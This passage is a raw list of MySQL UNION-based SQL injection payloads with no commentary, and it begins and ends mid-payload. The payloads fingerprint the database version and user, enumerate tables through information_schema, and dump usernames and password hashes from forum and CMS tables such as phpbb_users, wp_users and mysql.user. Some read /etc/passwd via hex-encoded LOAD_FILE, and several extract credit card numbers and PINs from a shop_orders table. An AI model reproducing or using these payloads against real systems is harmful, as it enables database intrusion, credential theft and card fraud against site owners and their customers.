1,2,3,4,column_name,6,7,8 from information_schema.columns where table_name=0x75736572 limit 1,1-- -1 union select 1,2,3,4,concat(0x12,version(),0x12,user(),0x12),concat(0x21,user,0x21,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from users/* -1 UNION SELECT 1,2,3,4,concat(0x3a3a3a,concat_ws(0x3a3a3a,id,name,company,email,city,address,phone,login,pwd),0x3a3a3a),6,7,8,9 FROM ems_clients LIMIT 0,1/* 1 union select 1,2,3,4,concat(0x3,version(),user(),database()),6,7,8,9,10,11,12 limit 1,1 -1 UNION SELECT 1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13,14,15,16-- -1 union select 1,2,3,4,concat(admin,0x2b,pass,0x2b,nick,0x2b,icq),6,7,8,9,10 from users/* -1 union select 1,2,3,4,concat(char(58,58,58),concat_ws(char(46),table_schema,table_name),char(58,58,58)),6,7,8,9,10,11,12,13,14 from information_schema.tables-- -1 union select 1,2,3,4,concat(database(),0x3a,user(),0x3a,version()),6,7 -1' union select 1,2,3,4,concat(database(),0x3a,version(),0x3a,user()),6,7,8,9,10,11,12,13/* -1 union select 1,2,3,4,concat(database(),char(58),user(),char(58),version()),6/* -1 union select 1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8/* -1 union select 1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12/* -1 union select 1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17,18/* -1 union select 1,2,3,4,concat(database(),char(58),user(),char(58),version()),6 from users/* -1 union select 1,2,3,4,concat(firstname,0x3a,passwd,0x3a,lastname,0x3a,email),6,7,8,9,10,11,12,13,14,15,16 FROM bt_users-- 1' union select 1,2,3,4,concat(id,0x3a,password),version(),7,8 from a_users/* -1 union select 1,2,3,4,concat(id,char(58),username,char(58),email),6 from users/* 1 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from leon_users/* -1 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from lucsor_users/* 1 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from melody_users/* -1 union select 1,2,3,4,concat(name,0x3a,pass),6,7,8,9,10 from users/* -1 union select 1,2,3,4,concat(name,0x3a,pwd),6,7,8,9,10,11,12 FROM admins limit 1,1-- -1 union select 1,2,3,4,concat(pn_uname,0x3a,pn_pass,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17 from nuke_users limit 1,1/* -1 union select 1,2,3,4,concat(psw,0x3a,user),name,7,8,9,10,11,12 from forum_users limit 0,10/* -1 union select 1,2,3,4,concat(uid,0x3a,uname,0x3a,name,0x3a,email,0x3a,pass),6,7,8,concat(user_icq,0x3a,user_aim,0x3a,user_yim,0x3a,user_msnm,0x3a,url,0x3a,emailpass) from mpn_users where uid=2/* -1 union select 1,2,3,4,concat(user,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from users -1 union select 1,2,3,4,concat(user(),0x3a,version(),0x3a,database())/* -1 union select 1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11/* -1 union select 1,2,3,4,concat(user,0x3,password) from mysql.user-- -1 union select 1,2,3,4,concat(user(),char(58),version(),char(58),database()),6,7,8 /* -1 union select 1,2,3,4,CONCAT(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users/* -1 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11 from mos_users -1 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11 from mos_users-- -1 UNION SELECT 1,2,3,4,concat(username,0x3a,password),6,7 FROM users LIMIT 0,1/* -1 union select 1,2,3,4,concat(username,0x3a,user_password,0x3a,user_email),6,7 from phpbb_users limit 1,1/* -1 union select 1,2,3,4,concat(username,0x3a,user_password),6,7,8,9,10,11 from bb_users limit 1,1/* -1 union select 1,2,3,4,concat(username,0x3a,user_password) ,6,7,8 from phpbb_users limit 4,10/* -1 union select 1,2,3,4,concat(username,char(58),password),6,7 from users limit 0,1/* -1 union select 1,2,3,4,concat(username,char(64),user_password,0x25,user_email),6,7,8,9,10,11,12 from phpbb_users limit 1,1/* -1 UNION SELECT 1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10/* -1 union select 1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -1 union select 1,2,3,4,concat(version(),char(58),database(),char(58),user()),6,7,8 -- -1' union select 1,2,3,4,concat(version(),char(58),user(),char(58),database()),6,7/* -1 union select 1,2,3,4,concat_ws(0x05,version(),database(),user()),6,7,8,9/* -1 union Select 1,2,3,4,concat_ws(0x20,id,fname,mname,email,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from USERLIST_TAB-- -1 union select 1,2,3,4,concat_ws(0x20,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 1 union select 1,2,3,4,concat_ws(0x2a,user(),0x2a,version(),0x2a,database()),6,7/* -1 union select 1,2,3,4,concat_ws(0x2a,username,password,email,admin),6 FROM apga_members limit 0,1-- -1 union select 1,2,3,4,CONCAT_WS(0x2C,USER(),DATABASE(),VERSION()),6,7,8,9,10,11,12 -1 union select 1,2,3,4,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary)),6/* -1 union select 1,2,3,4,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary)),6,7,8/* -1' union select 1,2,3,4,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary)),6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1/* -1 union select 1,2,3,4,concat_ws(0x2F,version(),database(),user())/* -1' union select 1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9/* -1' union select 1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10,11,12/* -1 union select 1,2,3,4,concat_ws(0x3a3a3a,version(),database(),user())-- -1 union select 1,2,3,4,concat_ws(0x3a3a,id,nom,pwd) from bc_admin -- -1 union select 1,2,3,4,concat_ws(0x3a3a,login,contrasena,nombre,apellido,email,tipo,estado),6,7,8,9,10,11 from usuarios limit 2,1 -- -1 union select 1,2,3,4,concat_ws(0x3a3a,login,pass),6,7 from test_users limit 1,1-- -1 union select 1,2,3,4,concat_ws(0x3a3a,login,pwd,user()),6,7,8,9,10,11,12 from login limit 0,1/* 1 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6/* -1 union select 1,2,3,4,concat_ws(0x3a,database(),user(),version(),@@version_compile_os),6 1' UNION SELECT 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6/* -1 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,0,10-- -1 union select 1,2,3,4,concat_ws(0x3a,FirstName,LastName,ShippingAddress,Country,City,State,Zip,Email,Phone,CreditCardType,CreditCardNumber,CreditCardName,CreditCardExpiryDate,CreditCardPinNumber),6,7,8 from shop_orders-- -1 union select 1,2,3,4,concat_ws(0x3a,fname,pword,umail,memlev),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mpmadmin.tbladmin limit 0,1-- -1) union select 1,2,3,4,concat_ws(0x3a,ID,NICK,PASSWORD,EMAIL,ICQ),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from gamato_fileish.f_users limit 0,1 -- -1 union select 1,2,3,4,concat_ws(0x3a,name,password,email),6,7 from users/* -1 union select 1,2,3,4,concat_ws(0x3a,nombre,password,email) from usersshop/* -1 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6 -1 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7-- -1' union select 1,2,3,4,concat_Ws(0x3a,user(),database(),version()),6,7/* -1 union select 1,2,3,4,concat_ws(0x3a, user(), database(), version()),6,7,8 /* -1 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8 -- -1' union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9 -- -1 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11-- -1 UNION SELECT 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11 -- -1 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12 -- -1 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 1 UNION SELECT 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -1 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -1 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),6,7,8,9,10 -- -1 union select 1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,0,1,2,3,4,5,6 from users-- -1 union select 1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users/* -1 union select 1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11 from mos_users-- -1 union select 1,2,3,4,concat_ws(0x3a,username,user_password),6,7,8,9,10,11,12,13 from forum.phpbb_users limit 2,1/* -1 union select 1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11 from mysql.user/* -1 union select 1,2,3,4,concat_ws(0x3a,user(),version()),6,7,8,9,10,11,12,13,14,15 -- 1 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()) -- -1 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10-- -1 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10/* -1 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11-- -1' union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12/* 1 UNION SELECT 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 LIMIT 1,1/* -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()) -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6-- -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7-- -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9-- -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12 -- -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14-- -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- -1 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)-- -1 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10/* -1 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database())/* -1 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6 -1 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8 -- -1 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9/* -1 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -1 union select 1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17 -- 1 UNION SELECT 1,2,3,4,concat_ws(0x3b,pseudo,pass,email),6,7 from tr_user_news/* -1 union select 1,2,3,4,concat_ws(0x3b,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16/* -1 union select 1,2,3,4,concat_ws(0x7c,user(),0x7c,database(),0x7c,version()),6/* 1 union select 1,2,3,4,concat_ws(char(32,58,32),version(),user(),database()),6,7,8,9/* -1 union select 1,2,3,4,concat_ws(char(58),id,email,password),6,7,8,9,0,1 from admins -1 union select 1,2,3,4,concat_ws(char(58),username,password,salt,email,icq,skype) from vbuser/* -1 union select 1,2,3,4,concat_ws(CHAR(58),VERSION(),DATABASE(),USER()),6,7,8,9/* -1 union select 1,2,3,4,concat_ws(version(),database(),user())-- -1 union select 1,2,3,4,convert(concat(database(),char(58),user(),char(58),version()),char),6,7,8/* -1 union select 1,2,3,4,convert(concat(database(),char(58),user(),char(58),version()),char),6,7,8,9,10,11,12,13/* -1 union select 1,2,3,4,email,6,nombre,pass,9,10 from lectores -1 union select 1,2,3,4 from admin/* -1 union select 1,2,3,4 from adminmenus -- -1 union select 1,2,3,4,group_concat(0x3a,table_name),6,7,8,9,10,11,12 from information_schema.tables where table_schema=0x73616b68706f6c696365 -- -1 UNION SELECT 1,2,3,4,group_concat(column_name) from information_schema.columns wheretable_name=0x74626c61646d696e-- -1 union select 1,2,3,4,group_concat(CreditCardType,char(58),CreditCardNumber,char(58),CreditCardName,char(58),CreditCardPinNumber,0x3c62723e),6,7,8 from shop_orders-- -1) UNION SELECT 1,2,3,4,group_concat(f_account,0x3B,f_password SEPARATOR 0x0b),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM manlico_web.ft_admin -- -1 union select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_rows>100 -- -1 union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables-- -1 union select 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10 from emp_users -- -1 union select 1,2,3,4,group_concat(username,0x3a,user_password,0x0a),6,7,8,9,10 from phpbb_users -- -1 union select 1,2,3,4,lastip,6,7,8 from i31girl_cms.31girlpages -- -1 union select 1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8 -1 union select 1,2,3,4,LOAD_FILE(0x2f6574632f706173737764),6,7,8,9,10,11/* -1' union select 1,2,3,4,LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100))/* -1 union select 1,2,3,4,login,6,pass,8,9,0 from admin/* -1 union select 1,2,3,4,login,passwd from users-- -1 union select 1,2,3,4,name,6,7,8,9 from forum/* -1' union select 1,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16 from exp_members /* -1 union select 1,2,3,4,password,login,7 from access -1 union select 1,2,3,4,password,user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from users where id=1/* -1' union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables -- -1 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14 from information_schema.tables limit 1,1/* 1 UNION SELECT 1,2,3,4,Table_name,6,7,8,9 from information_schema.tables/* 1 union select 1,2,3,4,table_name,6,7 from information_schema.tables limit 0,1 -- 1 union select 1,2,3,4,unhex(hex(concat(0x3a,version(),database(),user()))),6,7,8,9,10,11,12,13,14/* -1 union select 1,2,3,4,unhex(hex(concat_ws(0x3a,password))),6,7,8,9 from user-- -1 union select 1,2,3,4,unhex(hex(group_concat(table_name))),6,7,8 from information_schema.tables-- -1 union select 1,2,3,4,unhex(hex(uSEr())),6,7,8,9,10 -- -1 union select 1,2,3,4,USER(),6,7,8,9,0,1,2,3,4,5,6,7 admins/* -1 union select 1,2,3,4,user(),6,7,8,9,10,11,12/* -1 union select 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15/* 1 union select 1,2,3,4,user,6,7,8,9,10,11,12,13,14,15 from mysql.user/* -1 union select 1,2,3,4,user(),6,version(),8,9,10,11/* -1 union select 1,2,3,4,user(),database(),7,version(),9,10/* -1 union select 1,2,3,4,username,6,7,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from users/* -1 union select 1,2,3,4,username,password,7,8,9,10,11 from users/* -1 union select 1,2,3,4,user,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from mysql.user/* -1 union select 1,2,3,4,user,password,email,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from users/* -1 union select 1,2,3,4,user(),version(),7,8,9,10,11/* 1 union select 1,2,3,4,user(),version(),7,8,9,10,11,12,13,current_date(),15,16,database(),18/* -1 union select 1,2,3,4,version()/* -1 /*!UNION*/ SELECT 1,2,3,4,version() -- -1 UNION SELECT 1,2,3,4,version() -- -1 union select 1,2,3,4,version(),6,7/* -1' union select 1,2,3,4,version(),6,7/* -1 union select 1,2,3,4,version(),6,7,8,9,10,11/* -1' UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17 -- -1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -- -1 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* -1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,31,32,33,34,35,36,37,38,39/* -1 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 -- -1 union select 1,2,3,4,version(),6,7,8,9,10,11,table_name from information_schema.tables-- -1 union select 1,2,3,4,version(),6,concat(database(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19,20/* -1 union select 1,2,3,4,version(),6 from ibf_members_converge/* 1' union select 1,2,3,4,version(),6,user(),8,9,10,11/* -1 union select 1,2,3,4,version(),user(),7,8,9,database(),11,12,13,14,15,16,17,18,19,20/* -1 union select 1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14,15-- -1 union select 1,2,3,,5,Version(),7,8/* -1 union select 1,2,3,aes_decrypt(aes_encrypt(concat(database(),0x3a,version(),0x3a,user()),1),1),5,6,7-- -1 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(concat(subscriberId,char(58),subscriber,char(58),code),0x71),0x71),5,6 from post_subscribers/* -1 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(concat(username,';',password),0x71),0x71),5,6,7,8,9,10,11 FROM users/* -1 union select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),1),1),5,6,7,8,9,10,11,12,13,14 /* -1 union select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)/* -1 union select 1,2,3,aes_decrypt(aes_encrypt(version(),0x71),0x71),5,6,7,8,9/* -1 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -1 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users -- -1 UNION SELECT 1,2,3,ascii(substring(password,1,1)),5,6,7,8,9 from mysql.user/* -1 union select 1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x6d746c5f7573657273-- -1 union select 1,2,3,column_name,5 from information_schema.columns where table_name=0x7573657273-- -1 union select 1,2,3,concat(0x3a3a,username,0x3a3a,password,0x3a3a) from accounts/* -1 union select 1,2,3,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6-- -1 union select 1,2,3,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7-- -1 union select 1,2,3,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16-- -1 union select 1,2,3,concat(0x3a,version(),database(),user()),5,6,7,8-- -1 union select 1,2,3,concat(admin_id,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from admin/* -1 union select 1,2,3,concat(admin_name,0x3a,admin_password),5,6,7,8,9,10,11 from admin limit 0,1-- -1 union select 1,2,3,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71))/* -1 union select 1,2,3,concat(database(),char(58),user(),char(58),version()),5/* -1 union select 1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13/* -1 union select 1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16/* -1 union select 1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17/* -1 union select 1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -1 union select 1,2,3,concat(f_id,0x3a,f_login),5,6 from t_admins limit 2,1-- -1 union select 1,2,3,concat(fio,char(58),userlogin,char(58),userpassword,char(58),email),5,6,7,8 from user/* -1 union select 1,2,3,concat(login,0x3a3a,password,0x3a3a,admin),5,6,7 from users limit 0,1 -1 union select 1,2,3,concat(login,char(58),email),5,6,7,8,9 from users/* -1 union select 1,2,3,concat(login,char(58),pass),5,6 from worldbrand.users limit 0,1/* -1 union select 1,2,3,concat(login,char(58),password),5,6 from admin_users limit 0,1/* -1 union select 1,2,3,concat(login,char(58),password,char(58),email,char(58)),5,6,7,8,9,10,11,12,13,14 from users limit 10/* -1 union select 1,2,3,concat(name,0x1,user,0x3,password),5,6 FROM users limit 0,1-- -1 union select 1,2,3,concat(name,0x3a,mgroup,0x3a,password,0x3a,email),5 from ibf_members limit 2,1-- -1 union select 1,2,3,concat(nick,0x3a,password,0x3a,name,0x3a,email,0x3a,status),5,6,7,8,9,10,11,12,13,14 FROM user_data-- -1 union select 1,2,3,concat(nick,0x3a,pwd),5,6,7 from users/* -1 union select 1,2,3,concat(table_name),5,6 from information_schema.tables -- -1 union select 1,2,3,concat(table_schema,char(58),table_name),5,6 from information_schema.columns where column_name=0x70617373776F7264 limit 0,1/* -1 union select 1,2,3,concat(uname,char(58),pass,char(58),email,char(58),user_icq,char(58),name),44,6,7,8,9,11111,11 from users limit 16,1/* -1 union select 1,2,3,concat(user(),0x0b,database(),0x0b,version()),5,6,7,8,9,10,11,12,13,14,15,16,17-- -1 UNION SELECT 1,2,3,concat(user(),0x3a,database(),0x3a,version())/* -1 union select 1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -1 union select 1,2,3,concat(user,0x3a,file_priv),5,6,7,8,9 from mysql.user limit 3,1/* -1' union select 1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16 from mysql.user/* -1' union select 1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12 from mysql.user limit 0,1/* -1 union select 1,2,3,concat(user,0x3a,password),5,6,7,8,9 from mysql.user/* -1 union select 1,2,3,concat(user,0x3a,password),5,6,7,8,9 from mysql.user limit 0,1/* -1' union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/* -1 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7/* -1 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -1 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* -1) UNION SELECT 1,2,3,concat(USER(),'
',DATABASE(),'
',VERSION())/* 1 union select 1,2,3,concat(user(),char(58),database(),char(58),version())/* -1 union select 1,2,3,concat(user(),char(58),database(),char(58),version()),5,6,7,8/* -1 union select 1,2,3,concat(user(),char(58),database(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -1 union select 1,2,3,concat(user,char(58),password),5 from mysql.user/* -1 union select 1,2,3,concat(user(),char(58),version(),char(58),database()),5,6,7/* -1 union select 1,2,3,CONCAT(user(),char(58),version(),char(58),database()),5,6,7,8,9,10,11,12,13,14,15 from admin/* -1 union select 1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8 from wp_users limit 0,1/* -1 union select 1,2,3,concat(user_login,char(58),user_pass,char(58),user_email),5,6,7,8,9 from wp_users/* -1 union select 1,2,3,concat(username,0x3a3a,pass),5,6,7 from law_users-- -1 union select 1,2,3,concat(username,0x3a3a,password),5,6,7,8,9,10,11,12,13,14,16 from sinfonie_user limit 1,10/* -1 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12 from ati_users/* -1 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12 from mos_users/* -1 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9 from jos_users/* -1 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9 from users/* -1 union select 1,2,3,concat(username,0x3a,password) from users/* -1 union select 1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from bb_users limit 1,1/* -1 union select 1,2,3,concat(username,char(58),pass),5,6,7 from user limit 0,1/* 1 union select 1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17 from jos_users limit 1,100/*-- -1 union select 1,2,3,concat(username,char(58),password,char(58)),5,6,7,8,9,10,11 from users/* -1 union select 1,2,3,concat(username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16 from phpbb_users/* -1 union Select 1,2,3,concat(user(),version(),database()),concat(uname,0x3a,upass),6,7 from users -1 union select 1,2,3,concat(version(),0x2F,database(),0x2F,user())/* -1 union select 1,2,3,concat(version(),0x3A,user(),0x3A,database()),5,6,7,8,9-- -1 union select 1,2,3,concat(version(),char(58),database(),char(58),user()),5,6/* -1 union select 1,2,3,concat_ws(0x203a20,user(),version(),database()),5,6 -1 union select 1,2,3,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from mysql.user-- -1 union select 1,2,3,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),load_file(0x2F6574632F706173737764),6 from mysql.user -- -1 union select 1,2,3,concat_ws(0x2a,user(),0x2a,database(),version()),5,6,7,8,9,10,11,12,13,14/* -1' union select 1,2,3,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary)),5,6,7,8,9,10/* -1 union select 1,2,3,concat_ws(0x2F,version(),database(),user())/* -1 union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5/* -1' union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5/* -1 union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5,6/* -1' union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8/* -1 union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13/* -1 union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13,1,1,1,1/* -1 union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -1' union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* -1 union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5 from users/* -1 union select 1,2,3,concat_ws(0x3a3a3a,version(),database(),user()),5,6,7-- -1 union select 1,2,3,concat_ws(0x3a3a3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -1' union select 1,2,3,concat_ws(0x3a3a,database(),version()),5,6,7 -- -1' union select 1,2,3,concat_ws(0x3a3a,id,password,email,level),5,6,7 from users -- -1' union select 1,2,3,concat_ws(0x3a3a,id,user,pass),5,6,7,8,9,10 from userlist -- -1 union select 1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9 1 union select 1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11/* -1 union select 1,2,3,concat_ws(0x3a,admin_name,admin_login,admin_password),5,6,7 from admins limit 0,1-- -1 union select 1,2,3,concat_ws(0x3a,concat_ws(0x3a,user(),version()),database()),5,6 -- -1' union select 